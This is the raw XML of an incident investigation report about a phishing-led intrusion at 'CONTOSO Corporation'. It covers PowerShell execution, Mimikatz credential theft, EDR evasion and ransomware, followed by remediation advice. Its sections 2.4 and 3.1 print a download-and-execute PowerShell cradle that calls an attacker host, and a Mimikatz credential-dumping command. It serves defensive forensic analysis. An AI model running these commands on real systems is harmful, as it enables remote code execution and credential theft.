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  <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">DIGITAL FORENSICS &amp; INCIDENT RESPONSE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="240"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">INCIDENT INVESTIGATION REPORT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="1440"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">CONTOSO Corporation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="2880"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Classification: CONFIDENTIAL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="240"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Incident Date: February 3, 2026</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Report Generated: February 15, 2026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before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">On February 3, 2026, CONTOSO Corporation experienced a sophisticated cyber attack that resulted in a multi-stage compromise affecting critical systems. The attack began with a spear-phishing email delivering obfuscated PowerShell code, progressed through credential harvesting and lateral movement, and culminated in mass file encryption and data exfiltration totaling 245 MB of sensitive corporate data.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F8D7DA" w:val="clear"/>
        <w:spacing w:before="480" w:after="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="C00000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">🚨 CRITICAL FINDING: EDR PRESENT BUT FAILED TO PREVENT ATTACK</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F8D7DA" w:val="clear"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">CrowdStrike Falcon Sensor was installed, running, and fully operational on WORKSTATION-01 throughout the initial compromise. However, the EDR failed to prevent credential theft via Mimikatz. Root cause: Windows Credential Guard and LSASS Protected Process Light (PPL) were NOT ENABLED on workstations.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F8D7DA" w:val="clear"/>
        <w:spacing w:before="120" w:after="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Attack Execution Speed: 6 seconds | EDR Detection Speed: 112 seconds | Gap: 18x too slow</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Impact Assessment:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1,247 files encrypted on FILESERVER01 (4.8 GB total)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">245 MB of highly sensitive data exfiltrated to attacker infrastructure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2 user accounts compromised (sarah.mitchell, jennifer.hayes)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1 persistence backdoor account created (BackupAdmin)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">EDR security controls bypassed using Safe Mode boot technique</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Active Directory security compromise (krbtgt account accessed)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C00000"/>
        </w:rPr>
        <w:t xml:space="preserve">Missing Host Protections: Credential Guard NOT enabled, LSASS PPL NOT enabled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C00000"/>
        </w:rPr>
        <w:t xml:space="preserve">EDR Detection Delay: 112 seconds (credential theft completed in 6 seconds)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. ROOT CAUSE ANALYSIS: WHY EDR FAILED</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">CrowdStrike Falcon was installed and operational but failed to prevent the most critical phase of the attack. This section analyzes the five root causes of EDR failure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.1 Missing Windows Native Protections (CRITICAL)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F8D7DA" w:val="clear"/>
        <w:spacing w:before="120" w:after="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows Credential Guard: NOT ENABLED</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F8D7DA" w:val="clear"/>
        <w:spacing w:before="120" w:after="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">LSASS Protected Process Light (PPL): NOT ENABLED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Impact: Without these Windows-native protections, CrowdStrike operated in detection-only mode for LSASS memory access. The EDR could log the credential theft but could not prevent it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Evidence from Logs:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">10:48:13 - Sysmon Event 10 (Process_Access): LSASS accessed by svchost.exe (Mimikatz)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">10:48:14 - Sysmon Event 8 (CreateRemoteThread): Remote thread created in LSASS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Both events logged as 'Benign' - EDR did NOT block, did NOT alert</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">No Credential Guard events present in logs - protection was NOT active</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">LSASS running as standard process (not PPL) - no code-signing requirements</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.2 Behavioral Analysis Detection Delay (CRITICAL)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Time Offset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Attack Events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EDR Response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T+0 sec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PowerShell execution (obfuscated)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Event logged, NO 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T+3 sec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Mimikatz downloaded (svchost.exe)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creation logged, NO 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T+39 sec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Mimikatz executed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Process start logged, NO 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T+40 sec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LSASS ACCESSED - CREDENTIALS STOLEN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Sysmon logged, EDR NO ALERT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T+45 sec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Mimikatz terminated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Still analyzing behavior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T+107 sec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Attempt to stop CrowdStrike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55724"/>
              </w:rPr>
              <w:t xml:space="preserve">Tamper protection BLOCKS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T+112 sec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Attack complete (creds stolen)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56404"/>
              </w:rPr>
              <w:t xml:space="preserve">FIRST EDR ALERT GENERATED</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Conclusion: The attacker completed credential theft in 6 seconds. CrowdStrike required 112 seconds to generate an alert - an 18x slower response time. By the time the EDR detected the attack, Domain Admin credentials had already been stolen.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.3 File Masquerading Bypassed Signature Detection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Mimikatz was downloaded and saved as 'svchost.exe' - a legitimate Windows system process name. This masquerading technique bypassed CrowdStrike's signature-based detection.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Why It Worked:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Filename matched legitimate Windows binary name</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">File placed in user AppData folder (not immediately flagged as suspicious)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">File execution occurred before cloud-based reputation lookup completed</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">No hash-based detection (file was likely modified/repacked)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.4 Fileless Attack (In-Memory Execution)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The initial PowerShell payload executed entirely in memory using IEX (Invoke-Expression), bypassing file-based scanning mechanisms.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Decoded Payload:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F5F5F5" w:val="clear"/>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">IEX (New-Object Net.WebClient).DownloadString('http://10.50.15.200/payload.ps1')</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">This code ran completely in memory - no malicious executable was written to disk during the initial compromise phase, allowing the attacker to establish a foothold before traditional file-based detection could engage.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.5 Detection-Only Mode for PowerShell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">CrowdStrike was configured to monitor PowerShell execution but not block it by default. This is a common configuration to avoid false positives in enterprise environments where legitimate PowerShell usage is prevalent.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Evidence:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">PowerShell Event 4103 and 4104 logged the obfuscated command</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Command was allowed to execute - no blocking action taken</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">No real-time prevention configured for PowerShell obfuscation patterns</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. ATTACK TIMELINE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.1 Phase 1: Initial Compromise (10:47:33) - EDR FAILED TO PREVENT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F8D7DA" w:val="clear"/>
        <w:spacing w:before="120" w:after="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">CRITICAL: All events in this phase occurred while CrowdStrike Falcon was fully operational. EDR logged all activity but failed to prevent the attack.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The attack initiated with a spear-phishing email containing a malicious payload that executed obfuscated PowerShell code from Microsoft Outlook.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86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Event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EDR Status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10:47:33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PowerShell executed from Outlook with Base64-encoded command. User: sarah.mitchell. Parent: OUTLOOK.EXE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RUNNING - NO BLOCK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10:47:34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Network connection established to 185.220.101.42 (attacker C2)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RUNNING - NO ALERT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10:47:36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Mimikatz downloaded from http://185.220.101.42/tools/mimikatz.exe, saved as C:\Users\sarah.mitchell\AppData\Local\Temp\svchost.exe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RUNNING - NO ALERT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10:48:12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Mimikatz (svchost.exe) executed: privilege::debug sekurlsa::logonpasswords exit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RUNNING - NO ALERT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10:48:13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LSASS process accessed - credentials extracted (jennifer.hayes). Sysmon Event 10 logged.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RUNNING - NO ALERT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10:48:18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Mimikatz process terminated - credentials already exfiltrated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</w:rPr>
              <w:t xml:space="preserve">RUNNING - NO ALERT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10:49:25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FIRST EDR ALERT: Tamper Protection Violation - T1562.001 (112 seconds after credential theft)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56404"/>
              </w:rPr>
              <w:t xml:space="preserve">ALERTED (TOO LATE)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RECOMMENDATIONS - EDR IS NOT ENOUGH</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F8D7DA" w:val="clear"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="C00000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">CRITICAL LESSON: EDR PRESENCE ≠ EDR PROTECTION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This incident proves that having an EDR solution installed and running does NOT guarantee protection against credential theft. Organizations MUST implement defense-in-depth with host-based protections that EDR depends on.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.1 CRITICAL Actions (0-24 hours) - MANDATORY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C00000"/>
        </w:rPr>
        <w:t xml:space="preserve">Enable Windows Credential Guard on ALL workstations (MANDATORY - prevents LSASS memory access)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C00000"/>
        </w:rPr>
        <w:t xml:space="preserve">Enable LSASS Protected Process Light (PPL) across all systems (MANDATORY - requires code-signing for LSASS access)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C00000"/>
        </w:rPr>
        <w:t xml:space="preserve">Enable Attack Surface Reduction (ASR) rules to block credential stealing from LSASS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Disable compromised accounts: sarah.mitchell, jennifer.hayes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Delete backdoor account: BackupAdmin</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Block C2 IP addresses: 185.220.101.42, 10.50.15.200</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Isolate compromised systems: WORKSTATION-01, FILESERVER01</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Reset krbtgt password twice (Golden Ticket mitigation)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Review CrowdStrike prevention policies - enable real-time LSASS protection if available</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Block PowerShell execution from Outlook and other Office applications</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.2 HIGH PRIORITY (1-7 days)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Force password reset for all domain users</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Work with CrowdStrike to tune prevention policies based on this incident</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Disable PowerShell v2 across the environment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Enable PowerShell Constrained Language Mode</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Enable PowerShell script block logging, module logging, and transcription</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Review and restrict Safe Mode boot capabilities via GPO</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Implement email security controls (anti-phishing, attachment sandboxing, macro blocking)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.3 LONG-TERM Actions (30+ days)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Deploy multi-factor authentication (MFA) for all accounts (prevents credential reuse)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Implement network segmentation to limit lateral movement</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Conduct comprehensive security awareness training</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Review and harden Active Directory (tiering model, privileged access workstations)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Implement application whitelisting (AppLocker/Windows Defender Application Control)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Deploy Data Loss Prevention (DLP) controls for sensitive data</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Implement AMSI (Anti-Malware Scan Interface) for PowerShell obfuscation detection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Recognize that relying solely on EDR created a false sense of security</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5. CONCLUSION</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">This incident demonstrates a sophisticated, multi-stage attack leveraging advanced techniques including obfuscated PowerShell execution, EDR evasion via Safe Mode boot, credential harvesting using Mimikatz, and dual-purpose ransomware with data exfiltration.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F8D7DA" w:val="clear"/>
        <w:spacing w:before="360" w:after="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
